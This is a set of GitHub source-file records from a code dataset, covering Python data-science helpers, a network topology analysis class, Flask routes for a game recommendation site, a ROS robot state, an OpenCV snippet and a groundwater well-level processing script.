symbol,\n\t\t\t\t\t date = parse(date).date(),\n\t\t\t\t\t closing_price = float(closing_price))\n\nstock = parse_row(['MSFT', '2018-12-14', '106.03'])\n\nassert stock.symbol == 'MSFT'\nassert stock.date == datetime.date(2018, 12, 14)\nassert stock.closing_price == 106.03\n\nfrom typing import Optional\nimport re\n\ndef try_parse_row(row: List[str]) -> Optional[StockPrice]:\n\tsymbol, date_, closing_price_ = row\n\tif not re.match(r'^[A-Z]+$', symbol):\n\t\treturn None\n\ttry:\n\t\tdate = parse(date_).date()\n\texcept ValueError:\n\t\treturn None\n\ttry:\n\t\tclosing_price = float(closing_price_)\n\texcept ValueError:\n\t\treturn None\n\treturn StockPrice(symbol, date, 
closing_price)\n\nassert try_parse_row(['MSFT0', '2018-12-14', '106.03']) is None\nassert try_parse_row(['MSFT', '2018-12--14', '106.03']) is None\nassert try_parse_row(['MSFT', '2018-12-14', 'x']) is None\nassert try_parse_row(['MSFT', '2018-12-14', '106.03']) == stock\n\ndef subtract(v: Vector, w: Vector) -> Vector:\n\tassert len(v) == len(w), 'Векторы должны иметь одинаковую длину'\n\treturn [v_i - w_i for v_i, w_i in zip(v, w)]\n\ndef dot(v: Vector, w: Vector) -> float:\n\tassert len(v) == len(w)\n\treturn sum(v_i * w_i for v_i, w_i in zip(v, w))\n\ndef sum_of_squares(v: Vector) -> float:\n\treturn dot(v, v)\n\ndef squared_distance(v: Vector, w: Vector) -> float:\n\treturn sum_of_squares(subtract(v, w))\n\ndef distance(v: Vector, w: Vector) -> float:\n\treturn math.sqrt(squared_distance(v, w))\n\na_to_b = distance([63, 150], [67, 160])\na_to_c = distance([63, 150], [70, 171])\nb_to_c = distance([67, 160], [70, 171])\nprint(a_to_b, a_to_c, b_to_c)\n\na_to_b = distance([160, 150], [170.2, 160])\na_to_c = distance([160, 150], [177.8, 171])\nb_to_c = distance([170.2, 160], [177.8, 171])\nprint(a_to_b, a_to_c, b_to_c)\n\nfrom typing import Tuple\n\ndef scalar_multiply(c: float, v: Vector) -> Vector:\n\treturn [c * v_i for v_i in v]\n\ndef vector_sum(vectors: List[Vector]) -> Vector:\n\tassert vectors, 'Векторы не предоставлены!'\n\tnum_elements = len(vectors[0])\n\tassert all(len(v) == num_elements for v in vectors), 'Разные размеры!'\n\treturn [sum(vector[i] for vector in vectors)\n\t\t\tfor i in range(num_elements)]\n\ndef vector_mean(vectors: List[Vector]) -> Vector:\n\tn = len(vectors)\n\treturn scalar_multiply(1 / n, vector_sum(vectors))\n\ndef mean(xs: List[float]) -> float:\n\treturn sum(xs) / len(xs)\n\ndef de_mean(xs: List[float]) -> List[float]:\n\tx_bar = mean(xs)\n\treturn [x - x_bar for x in xs]\n\ndef variance(xs: List[float]) -> float:\n\tassert len(xs) >= 2, 'Дисперсия требует наличия не менее двух элементов'\n\tn = len(xs)\n\tdeviations = de_mean(xs)\n\tsum_of_squares = sum([d ** 2 for d in deviations])\n\treturn sum_of_squares / (n - 1)\n\ndef standard_deviation(xs: List[float]) -> float:\n\treturn math.sqrt(variance(xs))\n\ndef magnitude(v: Vector) -> float:\n\treturn math.sqrt(sum_of_squares(v))\n\ndef scale(data: List[Vector]) -> Tuple[Vector, Vector]:\n\tdim = len(data[0])\n\tmeans = vector_mean(data)\n\tstdevs = [standard_deviation([vector[i] for vector in data])\n\t\t\t for i in range(dim)]\n\treturn means, stdevs\n\nvectors = [[-3, -1, 1], [-1, 0, 1], [1, 1, 1]]\nmeans, stdevs = scale(vectors)\nassert means == [-1, 0, 1]\nassert stdevs == [2, 1, 0]\n\ndef rescale(data: List[Vector]) -> List[Vector]:\n\tdim = len(data[0])\n\tmeans, stdevs = scale(data)\n\trescaled = [v[:] for v in data]\n\tfor v in rescaled:\n\t\tfor i in range(dim):\n\t\t\tif stdevs[i] > 0:\n\t\t\t\tv[i] = (v[i] - means[i]) / stdevs[i]\n\treturn rescaled\n\nmeans, stdevs = scale(rescale(vectors))\nassert means == [0, 0, 1]\nassert stdevs == [1, 1, 0]\n\nimport tqdm\n\nfor i in tqdm.tqdm(range(100)):\n\t_ = [random.random() for _ in range(100000)]\n\ndef primes_up_to(n: int) -> List[int]:\n\tprimes = [2]\n\twith tqdm.trange(3, n) as t:\n\t\tfor i in t:\n\t\t\ti_is_prime = not any(i % p == 0 for p in primes)\n\t\t\tif i_is_prime:\n\t\t\t\tprimes.append(i)\n\t\t\tt.set_description(f'{len(primes)} простых')\n\treturn primes\n\nmy_primes = primes_up_to(100)\n\ndef de_mean(data: List[Vector]) -> List[Vector]:\n\tmean = vector_mean(data)\n\treturn [subtract(vector, mean) for vector in data]\n\ndef 
direction(w: Vector) -> Vector:\n\tmag = magnitude(w)\n\treturn [w_i / mag for w_i in w]\n\ndef directional_varience(data: List[Vector], w: Vector) -> float:\n\tw_dir = direction(w)\n\treturn sum(dot(v, w_dir) ** 2 for v in data)\n\ndef directional_varience_gradient(data: List[Vector], w: Vector) -> Vector:\n\tw_dir = direction(w)\n\treturn [sum(2 * dot(v, w_dir) * v[i] for v in data)\n\t\t\tfor i in range(len(w))]\n\ndef add(v: Vector, w: Vector) -> Vector:\n\tassert len(v) == len(w), 'Векторы должны иметь одинаковую длину'\n\treturn [v_i + w_i for v_i, w_i in zip(v, w)]\n\ndef gradient_step(v: Vector, gradient: Vector, step_size: float) -> Vector:\n\tassert len(v) == len(gradient)\n\tstep = scalar_multiply(step_size, gradient)\n\treturn add(v, step)\n\ndef first_principal_component(data: List[Vector],\n\t\t\t\t\t\t\t n: int = 100,\n\t\t\t\t\t\t\t step_size: float = 0.1) -> Vector:\n\tguess = [1.0 for _ in data[0]]\n\twith tqdm.trange(n) as t:\n\t\tfor _ in t:\n\t\t\tdv = directional_varience(data, guess)\n\t\t\tgradient = directional_varience_gradient(data, guess)\n\t\t\tguess = gradient_step(guess, gradient, step_size)\n\t\t\tt.set_description(f'dv: {dv:.3f}')\n\treturn direction(guess)\n\ndef project(v: Vector, w: Vector) -> Vector:\n\tprojection_length = dot(v, w)\n\treturn scalar_multiply(projection_length, w)\n\ndef remove_projection_from_vector(v: Vector, w: Vector) -> Vector:\n\treturn subtract(v, project(v, w))\n\ndef remove_projection(data: List[Vector], w: Vector) -> List[Vector]:\n\treturn [remove_projection_from_vector(v, w) for v in data]\n\ndef pca(data: List[Vector], num_components: int) -> List[Vector]:\n\tcomponents: List[Vector] = []\n\tfor _ in range(num_components):\n\t\tcomponent = first_principal_component(data)\n\t\tcomponents.append(component)\n\t\tdata = remove_projection(data, component)\n\treturn components\n\ndef transform_vector(v: Vector, components: List[Vector]) -> Vector:\n\treturn [dot(v, w) for w in components]\n\ndef transform(data: List[Vector], components: List[Vector]) -> List[Vector]:\n\treturn [transform_vector(v, components) for v in data]\n","repo_name":"MikhailSukhanov/DS_projects","sub_path":"DS_topics_Python_implementation/Working_with_data.py","file_name":"Working_with_data.py","file_ext":"py","file_size_in_byte":11797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21904085398","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom collections import defaultdict\nimport numpy as np\n# import numpy as np\n\nclass Topology():\n def __init__(self, name='Topological analysis', loc_err=False):\n self.topology = nx.DiGraph()\n self.name = name\n self.loc_err = loc_err\n\n def load_csv(self, csv_path):\n self.df = pd.read_csv(csv_path, index_col=0)\n\n def set_topology(self, topo):\n self.topology = topo\n\n # set edge color based on num invo weight\n def set_edge_colors(self):\n def normalize(x, max_invo, min_invo):\n max_range = 1.0\n min_range = 0.2\n return (max_range - min_range) * (x - min_invo) / (max_invo - min_invo) + min_range\n\n invos_dict = nx.get_edge_attributes(self.topology, 'num_invo')\n invos = list(invos_dict.values())\n max_invo = max(invos)\n min_invo = min(invos)\n return list(map(lambda x: cm.Blues(normalize(x, max_invo, min_invo)), invos))\n\n def set_node_colors_and_label(self, reg_node_color):\n node_color = []\n node_label_dict = {}\n for node in 
self.topology.nodes(data=True):\n if 'rank' in node[1]:\n node_color.append(cm.YlOrRd(float(node[1]['rank']/8)))\n else: \n node_color.append(reg_node_color)\n node_label_dict[node[0]] = node[1]['label']\n\n return node_color, node_label_dict\n\n def generate_topology(self, df: pd.DataFrame, row_labels: set, exclude=False, exclude_label='node', loc_err_conf={}):\n self.df = df\n self.exclude = exclude\n self.exclude_label = exclude_label\n self.row_labels = row_labels\n edge_attr_dict = defaultdict(dict)\n node_attr_dict = defaultdict(dict)\n\n # Check if predict column exists on the dataframe\n if self.loc_err and 'predict' not in self.df.columns:\n self.loc_err = False\n\n if self.loc_err and not loc_err_conf:\n raise Exception(\"Must provide loc_err_conf for Topology instance with loc_err enabled\")\n \n for _, row in self.df.iterrows():\n # filter out some nodes\n if not self.exclude:\n if (self.exclude_label in row[self.row_labels[0]] or self.exclude_label in row[self.row_labels[1]]):\n continue\n # generate DAG\n self.topology.add_edge(row[self.row_labels[0]], row[self.row_labels[1]])\n # edge attribute: number of invocation for the edge\n if 'num_invo' not in edge_attr_dict[(row[self.row_labels[0]], row[self.row_labels[1]])]:\n edge_attr_dict[(row[self.row_labels[0]], row[self.row_labels[1]])]['num_invo'] = 0\n edge_attr_dict[(row[self.row_labels[0]], row[self.row_labels[1]])]['num_invo'] += 1\n if self.loc_err and row['predict']:\n # edge attribute: boolean to indicate if the invocation was detected as anomalous\n edge_attr_dict[(row[self.row_labels[0]], row[self.row_labels[1]])]['anomalous'] = True\n\n\n if 'selected_features' in loc_err_conf:\n for k, v in loc_err_conf['selected_features'].items():\n edge_attr_dict = dict(edge_attr_dict)\n # edge attribute: features that were selected for anomaly detection of the edge\n edge_attr_dict[k]['selected_features'] = v\n nx.set_edge_attributes(self.topology, edge_attr_dict)\n\n # Set node fact\n for node in self.topology.nodes():\n node_attr_dict[node]['label'] = node\n\n if 'root_cause' in loc_err_conf:\n for rc in loc_err_conf['root_cause']:\n node_attr_dict[rc]['label'] += '*(RC)*'\n if 'predictions' in loc_err_conf:\n for rank, prediction in enumerate(loc_err_conf['predictions'], 1):\n node_attr_dict[prediction]['rank'] = rank\n node_attr_dict[prediction]['label'] += f'~[{rank}]'\n\n nx.set_node_attributes(self.topology, node_attr_dict)\n\n def pagerank(self):\n self.reversed_topology = self.topology.reverse(copy=True)\n pr = nx.pagerank(self.reversed_topology) \n self.pr = {k: v for k, v in sorted(pr.items(), key=lambda item: item[1], reverse=True)}\n return self.pr\n\n def get_io_egdes(self):\n def format_node(node):\n in_edges = list(self.topology.in_edges(node, data=True))\n out_edges = list(self.topology.out_edges(node, data=True))\n num_in = len(in_edges)\n num_out = len(out_edges)\n\n invo_in = []\n anomalies_in = 0\n for in_e in in_edges:\n invo_in.append(in_e[2]['num_invo'] )\n if 'anomalous' in in_e[2]:\n anomalies_in += 1\n\n invo_out = [] \n anomalies_out = 0\n for out_e in out_edges:\n invo_out.append(out_e[2]['num_invo']) \n if 'anomalous' in out_e[2]:\n anomalies_out += 1\n\n in_avg, in_var = calc_avg_and_var(invo_in)\n out_avg, out_var = calc_avg_and_var(invo_out)\n return_dict = {\n 'in_edges': in_edges,\n 'out_edges': out_edges,\n 'num_in': num_in,\n 'num_out': num_out,\n 'num_out-in': num_out - num_in,\n 'num_invo-in': sum(invo_in),\n 'num_invo-out': sum(invo_out),\n 'num_invo-in-avg': in_avg,\n 
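# averages/variances fall back to 'n/a' when a node has fewer than two incident edges (see calc_avg_and_var below)\n                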
'num_invo-out-avg': out_avg,\n 'num_invo-in-var': in_var,\n 'num_invo-out-var': out_var,\n } \n\n if self.loc_err:\n return_dict['num_anomalous_in'] = anomalies_in\n return_dict['num_anomalous_out'] = anomalies_out\n\n return return_dict\n\n def calc_avg_and_var(invo_list):\n if len(invo_list) > 1:\n return np.mean(np.asarray(invo_list)), np.var(np.asarray(invo_list))\n return 'n/a', 'n/a'\n\n \n self.nodes_desc = dict(map(lambda k: (k, format_node(k)), self.topology.nodes()))\n\n\n def rank_nodes(self, order: str):\n self.get_io_egdes()\n if order == 'out':\n return {k: v for k, v in sorted(self.nodes_desc.items(), key=lambda x: x[1]['num_out'], reverse=True)}\n\n elif order == 'in':\n return {k: v for k, v in sorted(self.nodes_desc.items(), key=lambda x: x[1]['num_in'], reverse=True)}\n\n elif order == 'diff':\n return {k: v for k, v in sorted(self.nodes_desc.items(), key=lambda x: x[1]['num_out-in'], reverse=True)}\n\n elif order == 'invo-in':\n return {k: v for k, v in sorted(self.nodes_desc.items(), key=lambda x: x[1]['num_invo-in'], reverse=True)}\n\n elif order == 'invo-out':\n return {k: v for k, v in sorted(self.nodes_desc.items(), key=lambda x: x[1]['num_invo-out'], reverse=True)}\n\n else:\n raise Exception(\"order must be either 'in', 'out', or 'diff'\")\n\n # TODO \n # node and edge coloring using cm\n # default configs\n def draw(self, show, path='', edge_label=False, plot_opt={}):\n plot_opt_default = {\n 'node_color': (0.57,0.71,0.41,0.75),\n 'node_lable':{},\n 'edge_color': 'gray',\n }\n if 'ax' not in plot_opt:\n def_fig = plt.figure(figsize=[16,9],dpi=120)\n def_ax = def_fig.add_axes([0,0,1,1])\n def_ax.set_title(self.name)\n plot_opt_default['ax'] = def_ax\n\n plot_opt = plot_opt_default | plot_opt\n\n if self.loc_err:\n plot_opt['edge_color'] = self.set_edge_colors()\n\n plot_opt['node_color'], plot_opt['node_label'] = self.set_node_colors_and_label(plot_opt['node_color'])\n\n anomalous_edges = nx.get_edge_attributes(self.topology, 'anomalous')\n anomalous_edges = list(anomalous_edges.keys()) \n nx.draw_networkx_edges(self.topology, pos=nx.nx_pydot.graphviz_layout(self.topology, prog='dot'), edgelist=anomalous_edges, style='solid', ax=plot_opt['ax'], width=3, arrowsize=1, edge_color='red')\n\n el = nx.get_edge_attributes(self.topology, 'selected_features')\n for k, v in el.items():\n plot_opt['ax'].plot([], [], 'r_', label=f'{k}: {\", \".join(v)}')\n\n nx.draw_networkx(self.topology, pos=nx.nx_pydot.graphviz_layout(self.topology, prog='dot'), ax=plot_opt['ax'], node_size=300, font_size=7, font_color='#373737', width=2, arrowsize=10, edge_color=plot_opt['edge_color'], node_color=plot_opt['node_color'], labels=plot_opt['node_label'])\n\n if edge_label:\n el = nx.get_edge_attributes(self.topology, 'num_invo')\n bbox = dict(boxstyle='round', ec=(0.0, 1.0, 1.0, 0), fc=(0.0, 1.0, 1.0, 0))\n nx.draw_networkx_edge_labels(self.topology, pos=nx.nx_pydot.graphviz_layout(self.topology, prog='dot'), ax=plot_opt['ax'], edge_labels = el, font_size=8, verticalalignment='bottom', label_pos= 0.5, rotate=True, bbox=bbox)\n\n plot_opt['ax'].legend()\n\n if show:\n plt.show()\n if path:\n plt.savefig(path)\n plt.close()\n\n","repo_name":"hanapedia/rca_implemented","sub_path":"topological_analysis/topological_analysis.py","file_name":"topological_analysis.py","file_ext":"py","file_size_in_byte":9285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27158260642","text":"import os\nimport random\nimport string\nfrom PIL import 
Image\nfrom flask import render_template, url_for, flash, redirect, request, abort\nfrom psrPlatform import app, db, bcrypt\nfrom psrPlatform.forms import RegistrationForm, LoginForm, RateForm, PicForm\nfrom psrPlatform.models import Users, Products, Ratings\nfrom psrPlatform import SVDpp_val, user_knn, user_pool\nfrom psrPlatform import get_similar_users, get_top_N_recommended_items\nfrom flask_login import login_user, current_user, logout_user, login_required\nfrom werkzeug.utils import secure_filename\nimport pickle\nimport numpy as np\nimport tensorflow as tf\nfrom keras.preprocessing import image\nfrom keras.models import load_model\nfrom keras.backend import clear_session, set_session\nfrom datetime import timedelta\n\n## load the deep learning model\nlabel2idx = pickle.load(open('./psrPlatform/img_model/img_label2idx.pkl', 'rb'))\nidx2label = {i:j for j, i in label2idx.items()}\nsess = tf.Session()\ngraph = tf.get_default_graph()\nset_session(sess)\nmodel = load_model(\"./psrPlatform/img_model/model_47000img_identification.h5\") \n\ndef gen_reviewerID(stringLength=14):\n    lettersAndDigits = string.ascii_letters + string.digits\n    return ''.join((random.choice(lettersAndDigits) for i in range(stringLength))).upper() \n\n# default page\n@app.route(\"/\")\n@app.route(\"/default\")\ndef default():\n    return render_template('default.html')\n\n# home page\n@app.route(\"/home\")\n@login_required\ndef home():\n    user = Users.query.filter_by(reviewerName=current_user.reviewerName).first_or_404()\n    return render_template('home.html', username=user.reviewerName)\n\n\n@app.route(\"/games_by_p/<price_choose>\")\n@login_required\ndef games_by_p(price_choose):\n    page = request.args.get('page', 1, type=int)\n    price_choose_int = int(price_choose)\n    games = Products.query.filter(Products.price < price_choose_int).paginate(page=page, per_page=5)\n    return render_template('games_list.html', games=games, price_choose=price_choose)\n\n@app.route(\"/games_by_pic\", methods=['GET', 'POST'])\n@login_required\ndef games_by_pic():\n    form = PicForm()\n    if form.validate_on_submit():\n        games_pre = pre_picture(form.picture.data)\n        games_found = [Products.query.filter_by(asin = i).first() for i in games_pre]\n        games_found = [i for i in games_found if i is not None]\n        if games_found:\n            return render_template('games_list_pic.html', games = games_found)\n        else: \n            flash('Whoops. Unable to find the image due to no record in database. Try another one.', 'danger')\n    return render_template('search_by_pic.html', form=form, legend='Search by Picture')\n\n@app.route(\"/recommended_games\")\n@login_required\ndef recommended_games():\n    user = Users.query.filter_by(reviewerName=current_user.reviewerName).first_or_404()\n    userId = Users.query.filter_by(reviewerName=current_user.reviewerName).first().reviewerID\n    print(userId)\n    if userId not in user_pool:\n        userId = random.sample(user_pool, 1)[0]\n    recom_games = get_top_N_recommended_items(userId)\n    games_found = [Products.query.filter_by(asin = i).first() for i in recom_games]\n    games_found = [i for i in games_found if i is not None]\n    if games_found :\n        return render_template('recommended_games.html', games = games_found)\n    else:\n        flash('Unable to recommend. 
Rate more games would help the system learn!', 'danger')\n        return render_template('home.html', username=user.reviewerName)\n\n\n\n@app.route(\"/games/<game_id>\")\n@login_required\ndef game_detail(game_id):\n    game = Products.query.filter_by(asin = game_id).first_or_404()\n    page = request.args.get('page', 1, type=int)\n    rates = Ratings.query.filter_by(asin = game_id).order_by(Ratings.reviewTime.desc())\\\n        .paginate(page=page, per_page=5)\n    return render_template('game_detail.html', game = game, rates = rates)\n\n@app.route(\"/rate/new\", methods=['GET', 'POST'])\n@login_required\ndef create_post():\n    form = RateForm()\n    if form.validate_on_submit():\n        game = Products.query.filter_by(asin = form.game_id.data).first()\n        #print(game.asin)\n        rate = Ratings(product=game,\n                       reviewerName = current_user.reviewerName,\n                       reviewText=form.comment.data,\n                       summary = form.summary.data,\n                       rating = int(form.score.data),\n                       author=current_user)\n        db.session.add(rate)\n        db.session.commit()\n        flash('Your rate has been submitted!', 'success')\n        return redirect(url_for('home'))\n    return render_template('create_post.html', title='New Rate',\n                           form=form, legend='New Rate')\n\n@app.route(\"/user_rates\")\n@login_required\ndef user_rates():\n    page = request.args.get('page', 1, type=int)\n    rates = Ratings.query.filter_by(author=current_user)\\\n        .order_by(Ratings.reviewTime.desc())\\\n        .paginate(page=page, per_page=5)\n    username=current_user.reviewerName\n    return render_template('user_rates.html', rates=rates, username=username)\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n    if current_user.is_authenticated:\n        return redirect(url_for('home'))\n    form = RegistrationForm()\n    if form.validate_on_submit():\n        hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n        while True:\n            new_reviewerID = gen_reviewerID()\n            if not Users.query.get(new_reviewerID):\n                break\n        user = Users(reviewerID = new_reviewerID, reviewerName=form.username.data, reviewerPW=hashed_password)\n        db.session.add(user)\n        db.session.commit()\n        flash('Your account has been created! You are now able to log in', 'success')\n        return redirect(url_for('login'))\n    return render_template('register.html', title='Register', form=form)\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n    if current_user.is_authenticated:\n        return redirect(url_for('home'))\n    form = LoginForm()\n    if form.validate_on_submit():\n        user = Users.query.filter_by(reviewerName=form.username.data).first()\n        if user and bcrypt.check_password_hash(user.reviewerPW, form.password.data):\n            login_user(user,duration = timedelta(minutes=5))\n            next_page = request.args.get('next')\n            return redirect(next_page) if next_page else redirect(url_for('home'))\n        else:\n            flash('Login Unsuccessful. 
Please check account and password', 'danger')\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('default'))\n\n\ndef save_picture(form_picture):\n picture_path = os.path.join(app.root_path, 'static/profile_pics', form_picture.filename)\n output_size = (150, 150)\n i = Image.open(form_picture)\n i.thumbnail(output_size)\n i.save(picture_path)\n\n return picture_path\n\n\ndef pre_picture(form_picture):\n img = Image.open(form_picture)\n img = img.resize((150, 150))\n x = np.expand_dims(image.img_to_array(img), axis=0)/255.0\n #print(x.shape)\n #print(model.summary())\n global sess\n global graph\n with graph.as_default():\n set_session(sess)\n pred = model.predict(x)\n #clear_session()\n # get top 3 product id with confidence\n pred = pred.flatten()\n top_3_idx = pred.argsort()[::-1][:3]\n top_3_items = {idx2label[i]:np.round(pred[i],10) for i in top_3_idx}\n print(top_3_items)\n top_3_list = sorted(top_3_items.keys(), key=lambda x: top_3_items[x], reverse = True) \n return top_3_list\n\n\n","repo_name":"aaron-DJUN/cloud_computing_proj","sub_path":"PSR_SaaS/psrPlatform/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38968896815","text":"# https://chaemi720.tistory.com/172\n\nfrom sys import stdin\n\nN, M = map(int, stdin.readline().split())\n\n# 수열, 수열에 들어간 요소 표시\ndef check(arr,visited):\n # 수열의 길이가 M인가?\n if len(arr) == M:\n print(*arr)\n return\n\n for i in range(1,N+1):\n # 수열에 없다면\n if visited[i] == 0:\n # 수열에 넣기\n visited[i] = 1\n check(arr+[i],visited)\n # 초기화\n visited[i] = 0\n\ncheck([],[0]*(N+1))\n ","repo_name":"chaemj97/Algorithm","sub_path":"2022년/6월/0618_백준_15649_N과M(1).py","file_name":"0618_백준_15649_N과M(1).py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37771561681","text":"from geometry_msgs.msg import Pose, PoseStamped, Point, Quaternion\nfrom pr2_pick_main import handle_service_exceptions\nfrom std_msgs.msg import Header\nfrom pr2_pick_manipulation.srv import MoveArmIk, MoveArmIkRequest\nfrom visualization_msgs.msg import Marker\nimport moveit_commander\nimport outcomes\nimport rospy\nimport smach\nimport tf\nimport visualization as viz\nimport time\n\nclass DropOffItem(smach.State): \n \"\"\"Deposits the item into the order bin.\n \"\"\"\n name = 'DROP_OFF_ITEM'\n\n # The x,y coordinates the base should drive to for dropoffs in the order\n # bin frame\n DROPOFF_POS_BASE_X = -0.6040\n DROPOFF_POS_BASE_Y = 0.6604\n # The position the arm will move to before it lets go of the object\n DROPOFF_POS_ARM_X = 0.0872\n DROPOFF_POS_ARM_Y = -0.8277\n DROPOFF_POS_ARM_Z = 0.6577\n DROPOFF_QUAT_ARM_X = 0.0008\n DROPOFF_QUAT_ARM_Y = -0.7025\n DROPOFF_QUAT_ARM_Z = 0.0197\n DROPOFF_QUAT_ARM_W = -0.7114\n # The height the arm will start at before lowering into the bin to dropoff\n # object\n DROPOFF_POS_ARM_START_Z = 0.7477\n\n def __init__(self, **kwargs):\n smach.State.__init__(self,\n outcomes=[\n outcomes.DROP_OFF_ITEM_SUCCESS,\n outcomes.DROP_OFF_ITEM_FAILURE\n ],\n input_keys=['bin_id', 'bin_data', 'previous_item'],\n output_keys=['output_bin_data', 'previous_item']\n )\n self._tts = kwargs[\"tts\"]\n self._set_grippers = kwargs[\"set_grippers\"]\n self._drive_linear = kwargs[\"drive_linear\"]\n self._moveit_move_arm = 
kwargs[\"moveit_move_arm\"]\n self._move_arm_ik = kwargs[\"move_arm_ik\"]\n self._tuck_arms = kwargs[\"tuck_arms\"]\n self._markers = kwargs[\"markers\"]\n self._drive_to_pose = kwargs[\"drive_to_pose\"]\n self._tf_listener = kwargs[\"tf_listener\"]\n\n\n @handle_service_exceptions(outcomes.DROP_OFF_ITEM_FAILURE)\n def execute(self, userdata): \n\n # open gripper\n raw_input(\"Press enter to release item\")\n rospy.loginfo('Open gripper')\n self._set_grippers.wait_for_service()\n time.sleep(5)\n open_gripper_success = self._set_grippers(True, True, -1)\n rospy.loginfo(open_gripper_success)\n\n\n # get back to \"untucked\" position\n rospy.loginfo('Untucking right arm')\n self._tuck_arms.wait_for_service()\n retucked_success = self._tuck_arms(tuck_left=False, tuck_right=False)\n rospy.loginfo(retucked_success)\n\n return outcomes.DROP_OFF_ITEM_SUCCESS\n","repo_name":"hcrlab/push_pull","sub_path":"pr2_pick_main/scripts/states/DropOffItem.py","file_name":"DropOffItem.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74008832871","text":"import cv2\nimport numpy as np\nimport cv2.cv as cv\nimg = cv2.imread('image.png')\nimg = cv2.medianBlur(img,5)\n\ncontours,hierarchy = cv2.findContours(img, 1, 2)\n\ncnt = contours[0]\n(x,y),radius = cv2.minEnclosingCircle(cnt)\ncenter = (int(x),int(y))\nradius = int(radius)\nimg = cv2.circle(img,center,radius,(0,255,0),2)\n\ncv2.imshow('detected circles',img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"techalien/xestos","sub_path":"Haar cascade method/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40915983289","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport os\nimport sys\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nsys.path.append(r'D:/TreasureValley/vadose/WaterLevelProc')\nfrom WaterlevelTools import filterData, getWLalt, normscore\n\nVROOT = r'D:/TreasureValley/vadose'\n\n#---------------------------\n# Import nullset of TV wells, Data and site info\n# ---------------------------\nf = os.path.join(VROOT, 'data/groundwater/null/WellInfo_null.csv')\n#Read Wellsite\nWellsNull = pd.read_csv(f,\n header=0,\n infer_datetime_format=True, parse_dates=True,\n index_col='WellNumber')\nif os.path.isfile(os.path.join(VROOT,'data/groundwater/null/WellLevels_null.pkl')):\n DataNull = pd.read_pickle(os.path.join(VROOT,'data/null/WellLevels_null.pkl'))\n DataNull[['StatusName','MethodName','AgencyName']] = DataNull[['StatusName', 'MethodName', 'AgencyName']].astype(str)\n DataNull.index = DataNull.pop('MeasurementDate')\n #DataNull = DataNull.unstack( level = 0)\n #df = df.resample('D').mean()\n #df = df[df.notnull().any(axis=1)]\nelse:\n print('Pickle file does not exist. 
Create nullset pickle file to speed up reading')\n \n# ---------------------------------------------------------------------------\n# Define a dictionary of 'scenarios' or conditions for selecting wells\n# ------------------------------------------------------------------------\n\nscenarios = [{'description': 'Median1986_2018',\n 'minrec' : 5, \n 'date_start' : pd.datetime(1980,1,1),\n 'date_end' : pd.datetime(2018,1,1),\n 'data' : (),\n 'maxdepth' : 200},\n \n {'description' : 'WinterWY2016',\n 'minrec' : 1,\n 'date_start' : pd.datetime(2015,11,1),\n 'date_end' : pd.datetime(2016,4,1),\n 'data' : (),\n 'maxdepth' : 200 } ,\n \n {'description' : 'null',\n 'minrec' : 1,\n 'date_start' : pd.datetime(1910,1,1),\n 'date_end' : pd.datetime(2018,12,1),\n 'data' : (),\n 'maxdepth' : 1000}\n ]\n# Populate well data\nwldata = [filterData(s,DataNull, WellsNull) for i,s in enumerate(scenarios)]\nwldata = [getWLalt( df ) for df in wldata]\nwldata = [normscore(df,['DTWmed','ALTdtw'])[0] for df in wldata]\nfor i, df in enumerate(wldata):\n scenarios[i]['data'] = df\n#Attempt to populate with dictionary/list comprehension\n#data = [ {key: filterData(s,DataNull) for key,val in s.items() if key == 'data' } for s in scenarios]\n\n\n#-------------------------------------\n# Export some files\nimport pickle\n\n# Make directories for data \n[os.mkdir(os.path.join(VROOT,'data/groundwater',s['description'])) \nfor s in scenarios \nif not os.path.isdir(os.path.join(VROOT,'data/groundwater',s['description']))]\n\nfor s in scenarios:\n fdir = os.path.join(VROOT,r'data/groundwater',s['description'])\n with open( fdir + '\\\\' + s['description'] + '.pkl','wb') as handle:\n pickle.dump(s ,handle)\n\ngeoeas=False\nshapef = False\nif geoeas:\n dfout = wldata[0].filter(regex='IDTM|DTW|dtw')\n toGEOEAS(dfout.replace(np.nan,-999), r'D:/TreasureValley/vadose/data/groundwater/WL_all2.dat','Water level, 1980-present')\n \nelif shapef:\n# ---------- Export to shapefile\n from shapely.geometry import Point\n import geopandas\n # Name and directory creation\n SiteInfo = scenarios[0]['data']\n desc = scenarios[0]['description']\n f = 'TV_watertable_{}.shp'.format(desc)\n fdir = os.path.join(VROOT,'data',desc)\n if not os.path.isdir(fdir):\n os.mkdir(fdir)\n # Geospatial\n SiteInfo['geometry'] = SiteInfo.apply(lambda x: Point((float(x.XIDTM), float(x.YIDTM), float(x.ALTdtw))),axis=1)\n proj4str = '+proj=tmerc +lat_0=42 +lon_0=-114 +k=0.9996 +x_0=2500000 +y_0=1200000 +datum=nad83 +ellps=GRS80 +units=m +no_defs'\n SiteInfoGeo = geopandas.GeoDataFrame(SiteInfo,geometry='geometry',crs = proj4str)\n SiteInfoGeo.loc[:,~SiteInfoGeo.columns.str.contains('Date')].to_file(\n os.path.join(fdir,f),driver='ESRI Shapefile')\n\n\n#------Various Data Description queries\n# 753 Wells in study area\n# 